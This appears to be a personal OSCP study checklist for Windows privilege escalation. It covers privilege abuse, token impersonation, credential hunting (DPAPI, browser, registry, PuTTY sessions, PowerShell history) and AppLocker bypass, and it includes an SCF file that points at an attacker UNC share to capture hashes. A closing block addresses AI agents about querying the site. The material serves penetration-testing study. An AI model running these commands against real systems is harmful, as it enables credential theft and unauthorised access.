# Windows Privesc Checklist Check for hidden files in powershell with `ls -fo` Refer ## Privileges, groups,etc * [ ] Check permissions with `whoami /priv` and enable with [FullPowers](https://github.com/itm4n/FullPowers/releases/tag/v0.1)(`nt authority/local system` or `Network service`) * [ ] If in administrator group but still no access check [UAC](/oscp/readme/privilege-escalation/windows/uac.md) * [ ] [SeBackupPrivilege](/oscp/readme/privilege-escalation/windows/sebackupprivilege.md) * [ ] [SeRestorePrivilege](/oscp/readme/privilege-escalation/windows/serestoreprivilege.md) * [ ] *SeImpersonatePrivilege* ---> [GodPotato](https://github.com/BeichenDream/GodPotato), [Potatoes](/oscp/readme/privilege-escalation/windows/potatoes.md) * [ ] [SeDebugPrivilege](/oscp/readme/privilege-escalation/windows/sedebugprivilege.md) * [ ] [SeEnableDelegationPrivilege](/oscp/readme/privilege-escalation/windows/seenabledelegationprivilege.md) * [ ] [SeTakeOwnershipPrivilege](/oscp/readme/privilege-escalation/windows/setakeownershipprivilege.md) * [ ] [SeManageVolumePrivilege](/oscp/readme/privilege-escalation/windows/semanagevolumeprivilege.md) * [ ] [SeLoadDriverPrivilege](https://0xdf.gitlab.io/2020/10/31/htb-fuse.html#priv-svc-print--system) * [ ] [SeMachineAccountPrivilege](https://github.com/0xJs/RedTeaming_CheatSheet/blob/main/windows-ad/Domain-Privilege-Escalation.md) * [ ] Check Group membership with `whoami /groups` * [ ] If in *Print Operators* group --> [SeLoadDriverPrivilege](/oscp/readme/privilege-escalation/windows/seloaddriverprivilege.md) * [ ] [DnsAdmins](/oscp/readme/privilege-escalation/windows/dnsadmins.md) group * [ ] [Hyper-V Administrators](/oscp/readme/privilege-escalation/windows/hyper-v-administrators.md) group * [ ] [Server Operators](/oscp/readme/privilege-escalation/windows/server-operators.md) group * [ ] If in the **'Event Log Readers Group'** then use ``` wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user" ``` to view logs(can be used without creds). Can also use: ``` Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }} ``` * [ ] To check for [GPO](/oscp/readme/privilege-escalation/windows/gpo.md) use **Powerview** * [ ] Check for tokens with [incognito](https://github.com/FSecureLABS/incognito/blob/394545ffb844afcc18e798737cbd070ff3a4eb29/incognito.exe) * To list:`.\incognito.exe list_tokens -u` * To impersonate: `.\incognito.exe execute -c "domain\user" C:\Windows\system32\cmd.exe` * [ ] To check environment variable: `set`. Check Path to execute * [ ] View *named pipes*: ``` pipelist.exe /accepteula ``` Or in *powershell*: ``` gci \\.\pipe\ ``` * [ ] To check DACLs of all named pipes ``` .\accesschk.exe /accepteula \pipe\ ``` To check of a particular pipe: ``` accesschk.exe /accepteula \\.\Pipe\lsass -v ``` * [ ] If in *Ad Recycle Bin* group try: ``` Get-ADObject -SearchBase "CN=Deleted Objects,DC=Cascade,DC=Local" -Filter {ObjectClass -eq "user"} -IncludeDeletedObjects -Properties * ``` * [ ] If applocker is present place executable in `C:\Windows\System32\spool\drivers\color` ## [Mimikatz](/oscp/readme/privilege-escalation/windows/mimikatz.md) Use mimikatz once Administrator access is gained. Multiple techniques are outlined in the Mimikatz page ## SharpDPAPI ``` .\SharpDPAPI.exe machinecredentials ```
### Common Vulnerabilities * [ ] [PrintNighmare](https://www.hackingarticles.in/windows-privilege-escalation-printnightmare/) ### Social Engineering * [ ] Make a scf or [lnk](https://github.com/dievus/lnkbomb) file and put it in frequently accessed shares and start responder :) scf file: ```` ``` [Shell] Command=2 IconFile=\\10.10.14.3\share\legit.ico [Taskbar] Command=ToggleDesktop ``` ```` ### Programs & Services * [ ] To check running services: `tasklist /svc` * [ ] Check for [Weak Permissions](/oscp/readme/privilege-escalation/windows/weak-permissions.md) * [ ] Check for [Vulnerable Services](/oscp/readme/privilege-escalation/windows/vulnerable-services.md) * [ ] Check for [DLL Injection](/oscp/readme/privilege-escalation/windows/dll-injection.md) * [ ] Applocker info : ``` Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ``` * [ ] If Citrix try [Citrix Breakout](/oscp/readme/privilege-escalation/windows/citrix-breakout.md) * [ ] To get installed applications: *Remove "select displayname" to display all properties* 32 bit: ``` Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname ``` 64 bit: ``` Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname ``` Also check *Program files* directory and *Downloads* * [ ] To get running processes: `Get-Process` ### Network * [ ] For arp cache: `arp -a` * [ ] Network config: `ipconfig /all` * [ ] Routing table:`route` * [ ] For active ports that are listening: `netstat -ano` * [ ] Look for loopback addresses (*127.0.0.1* and *::1*) that are not listening on the IP Address (*10.129.43.8*) or broadcast (*0.0.0.0*, *::/0*).The reason for this is network sockets on localhost are often insecure due to the thought that "they aren't accessible to the network." ## Files & Creds (PuTTY,Autologon,etc) * [ ] [Credential Hunting](/oscp/readme/privilege-escalation/windows/credential-hunting.md) * [ ] Powershell To check if Script Block Logging or Powershell Transcription is turned on: ``` Get-History ``` Clear-History does not delete PSReadline ``` (Get-PSReadlineOption).HistorySavePath ``` Go to that path and check too. To display now: ``` type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt ``` ```powershell type C:\Users\Public\Transcripts\transcript01.txt ``` * [ ] Check for stored credentials ``` cmdkey /list ``` If stored credentials present can run commands as other users: ``` PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE" ``` * [ ] Browser Credentials: ``` .\SharpChrome.exe logins /unprotect ``` * [ ] Use *LaZagne* for getting various credentials * [ ] To look for saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials: ``` Import-Module .\SessionGopher.ps1 Invoke-SessionGopher -Target WINLPE-SRV01 # Locally: Invoke-SessionGopher -Thorough ``` * [ ] Clear text passwords in registry. *Autologon*: ``` query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" ``` *Putty*:\ For sessions-> ``` reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions ``` For keys and values of session: ``` reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aditya-3.gitbook.io/oscp/readme/privilege-escalation/windows/windows-privesc-checklist.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.